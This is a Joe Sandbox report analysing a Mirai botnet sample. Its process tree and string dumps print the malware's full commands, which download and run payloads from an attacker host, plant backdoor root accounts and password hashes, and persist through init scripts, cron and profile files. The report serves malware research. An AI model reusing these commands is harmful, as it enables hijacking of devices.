Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
SinYt5YXnO.elf

Overview

General Information

Sample Name:SinYt5YXnO.elf
Original Sample Name:07d574315f33f2b95716d6c3b48ad229.elf
Analysis ID:885812
MD5:07d574315f33f2b95716d6c3b48ad229
SHA1:ddbcb68b45b12b8af7a122b690fcbe543e7be5c3
SHA256:36cc8f2ee1d904cf90af5c5fa7b7173ad8fa5e2074d82a5e396b71ae1d497f02
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:37.1.0 Beryl
Analysis ID:885812
Start date and time:2023-06-12 10:16:03 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:SinYt5YXnO.elf
Original Sample Name:07d574315f33f2b95716d6c3b48ad229.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/9@2/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://%d.%d.%d.%d/bins.sh;
Command:/tmp/SinYt5YXnO.elf
PID:6222
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Segmentation Fault (memory)
Segmentation Fault (memory)
Standard Error:
  • system is lnxubuntu20
  • SinYt5YXnO.elf (PID: 6222, Parent: 6121, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/SinYt5YXnO.elf
    • SinYt5YXnO.elf New Fork (PID: 6225, Parent: 6222)
      • SinYt5YXnO.elf New Fork (PID: 6229, Parent: 6225)
        • SinYt5YXnO.elf New Fork (PID: 6243, Parent: 6229)
          • sh (PID: 6246, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> .profile"
          • sh (PID: 6317, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6245, Parent: 6229)
          • sh (PID: 6249, Parent: 6245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
          • sh (PID: 6318, Parent: 6245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6248, Parent: 6229)
          • sh (PID: 6253, Parent: 6248, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"echo \\\"ubnt:\\\\\\$1\\\\\\$PN1nGGW/\\\\\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\\\" > /var/etc/passwd && (sleep 120 && /bin/wget http://fucking.blackpeople.lol/mips -O /var/etc/persistent/pr0 && chmod 777 /var/etc/persistent/pr0 && /var/etc/persistent/pr0) &\" > /var/etc/persistent/rc.poststart && echo \"ubnt:\\$1\\$PN1nGGW/\\$KgZmi3bN1MBJvypq0J8la/:0:0:Administrator:/etc/persistent:/bin/sh\" > /var/etc/passwd"
          • sh (PID: 6327, Parent: 6248, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6251, Parent: 6229)
          • sh (PID: 6257, Parent: 6251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cfgmtd -w -p /etc/ && save"
          • sh (PID: 6330, Parent: 6251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6256, Parent: 6229)
          • sh (PID: 6261, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647\" >> /etc/profile"
          • sh (PID: 6329, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6260, Parent: 6229)
          • sh (PID: 6265, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"#!/bin/sh\\n\\nuseradd -u 0 -g 0 -o -d / ubnt -p '\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0/' >/dev/null 2>&1\" > /etc/cron.hourly/0"
          • sh (PID: 6333, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6262, Parent: 6229)
          • SinYt5YXnO.elf New Fork (PID: 6280, Parent: 6262)
            • sh (PID: 6290, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc/init.d/multipath-tools && chmod +x /etc/init.d/multipath-tools"
              • sh New Fork (PID: 6342, Parent: 6290)
              • chmod (PID: 6342, Parent: 6290, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/multipath-tools
            • sh (PID: 6365, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6266, Parent: 6229)
          • sh (PID: 6272, Parent: 6266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/rc.local && chmod +x /etc/rc.d/rc.local"
          • sh (PID: 6336, Parent: 6266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6270, Parent: 6229)
          • sh (PID: 6277, Parent: 6270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.d/clith.sh && chmod +x /etc/rc.d/clith.sh"
          • sh (PID: 6338, Parent: 6270, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6273, Parent: 6229)
          • sh (PID: 6279, Parent: 6273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/rc.local && chmod +x /etc/rc.local"
            • sh New Fork (PID: 6334, Parent: 6279)
            • chmod (PID: 6334, Parent: 6279, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/rc.local
          • sh (PID: 6359, Parent: 6273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6276, Parent: 6229)
          • sh (PID: 6283, Parent: 6276, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/rc.local && chmod +x /rc.d/rc.local"
          • sh (PID: 6343, Parent: 6276, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6281, Parent: 6229)
          • sh (PID: 6291, Parent: 6281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /rc.d/cliet.sh && chmod +x /rc.d/cliet.sh "
          • sh (PID: 6340, Parent: 6281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6288, Parent: 6229)
          • sh (PID: 6294, Parent: 6288, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /data/local/tmp; && busybox wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; sh bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /system/etc/init.d/arenahi && chmod +x /system/etc/init.d/arenahi "
          • sh (PID: 6345, Parent: 6288, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6292, Parent: 6229)
          • sh (PID: 6300, Parent: 6292, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc/init.d/rcD && chmod +x /etc/init.d/rcD"
            • sh New Fork (PID: 6344, Parent: 6300)
            • chmod (PID: 6344, Parent: 6300, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/rcD
          • sh (PID: 6363, Parent: 6292, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6297, Parent: 6229)
          • sh (PID: 6303, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /etc_ro/rcS && chmod +x /etc_ro/rcS"
          • sh (PID: 6348, Parent: 6297, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6302, Parent: 6229)
          • sh (PID: 6308, Parent: 6302, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" > /etc_ro/rcD && chmod +x /etc_ro/rcD"
          • sh (PID: 6353, Parent: 6302, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6305, Parent: 6229)
          • sh (PID: 6312, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd) &\" >> /usr/etc/profile"
          • sh (PID: 6351, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6310, Parent: 6229)
          • sh (PID: 6315, Parent: 6310, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$I4PkyslC\\$QfxbtwG2TLLBngD2HqOzu0:19391:0:99999:7:0:0:\" > /etc/shadow"
          • sh (PID: 6355, Parent: 6310, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • SinYt5YXnO.elf New Fork (PID: 6314, Parent: 6229)
          • sh (PID: 6321, Parent: 6314, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo -e \"admin:\\$1\\$\\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh\" > /etc/passwd"
          • sh (PID: 6352, Parent: 6314, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c save
        • sh (PID: 6320, Parent: 6229, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --destination-port 23 -j DROP"
          • sh New Fork (PID: 6349, Parent: 6320)
          • iptables (PID: 6349, Parent: 6320, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --destination-port 23 -j DROP
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    Timestamp:192.168.2.23107.154.156.974950855552840657 06/12/23-10:18:06.969880
    SID:2840657
    Source Port:49508
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23107.154.140.2534369455552840657 06/12/23-10:18:20.405406
    SID:2840657
    Source Port:43694
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2334.95.78.673970455552840657 06/12/23-10:18:28.473774
    SID:2840657
    Source Port:39704
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.232.51.74.1785303855552840657 06/12/23-10:17:13.889468
    SID:2840657
    Source Port:53038
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23202.243.135.1933850655552840657 06/12/23-10:18:20.380942
    SID:2840657
    Source Port:38506
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2318.180.250.2344871255552840657 06/12/23-10:17:11.687187
    SID:2840657
    Source Port:48712
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2335.190.42.943935655552840657 06/12/23-10:17:22.386132
    SID:2840657
    Source Port:39356
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.235.252.77.625318655552840657 06/12/23-10:17:37.666245
    SID:2840657
    Source Port:53186
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2334.36.224.714776455552840657 06/12/23-10:18:19.092951
    SID:2840657
    Source Port:47764
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2345.60.47.2534057255552840657 06/12/23-10:17:00.305679
    SID:2840657
    Source Port:40572
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.246.98.445664255552840657 06/12/23-10:17:38.781684
    SID:2840657
    Source Port:56642
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23178.143.16.2344530055552840657 06/12/23-10:17:01.379266
    SID:2840657
    Source Port:45300
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23188.149.193.655233455552840657 06/12/23-10:17:12.735686
    SID:2840657
    Source Port:52334
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23109.33.22.174726855552840657 06/12/23-10:17:59.904411
    SID:2840657
    Source Port:47268
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23104.232.104.1184294855552840657 06/12/23-10:17:16.097852
    SID:2840657
    Source Port:42948
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2334.120.12.716093455552840657 06/12/23-10:17:11.459710
    SID:2840657
    Source Port:60934
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2378.71.5.1784095055552840657 06/12/23-10:18:18.067070
    SID:2840657
    Source Port:40950
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2372.3.15.1745589655552840657 06/12/23-10:18:38.651827
    SID:2840657
    Source Port:55896
    Destination Port:5555
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: SinYt5YXnO.elfAvira: detected
    Source: SinYt5YXnO.elfReversingLabs: Detection: 36%
    Source: SinYt5YXnO.elfVirustotal: Detection: 40%Perma Link

    Spreading

    barindex
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647" >> .profile
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647" >> /etc/profile
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /etc/init.d/%s && chmod +x /etc/init.d/%s
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.d/rc.local && chmod +x /etc/rc.d/rc.local
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.d/clith.sh && chmod +x /etc/rc.d/clith.sh
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/rc.local && chmod +x /etc/rc.local
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /rc.d/rc.local && chmod +x /rc.d/rc.local
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /rc.d/cliet.sh && chmod +x /rc.d/cliet.sh
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /data/local/tmp; && busybox wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; sh bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /system/etc/init.d/arenahi && chmod +x /system/etc/init.d/arenahi
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc/init.d/rcD && chmod +x /etc/init.d/rcD
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /etc_ro/rcS && chmod +x /etc_ro/rcS
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" > /etc_ro/rcD && chmod +x /etc_ro/rcD
    Source: SinYt5YXnO.elfString: echo -e "(sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e "admin:\$1\$\$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh" > /etc/passwd) &" >> /usr/etc/profile
    Source: SinYt5YXnO.elfString: cd /tmp; wget http://fucking.blackpeople.lol/bins.sh -O /tmp/bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O /tmp/curlBins.sh; sh /tmp/bins.sh; sh /tmp/curlBins.sh; rm -rf bins.sh
    Source: SinYt5YXnO.elfString: asswordenablesystemshellsh/bin/busybox MIRAIncorrectMIRAI: applet not foundcd /tmp; wget http://fucking.blackpeople.lol/bins.sh -O /tmp/bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O /tmp/curlBins.sh; sh /tmp/bins.sh; sh /tmp/curlBins.sh; rm -rf bins.shcd /tmp; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips; tftp -g -r armv4l fucking.blackpeople.lol; chmod +x armv4l; ./armv4l; tftp -g -r mipsel fucking.blackpeople.lol; chmod +x mipsel; ./mipsel
    Source: .profile.32.drString: -e (sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647
    Source: rc.local.55.drString: -e (sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
    Source: multipath-tools.68.drString: -e (sleep 10 && cd /tmp; cd /var/tmp; wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
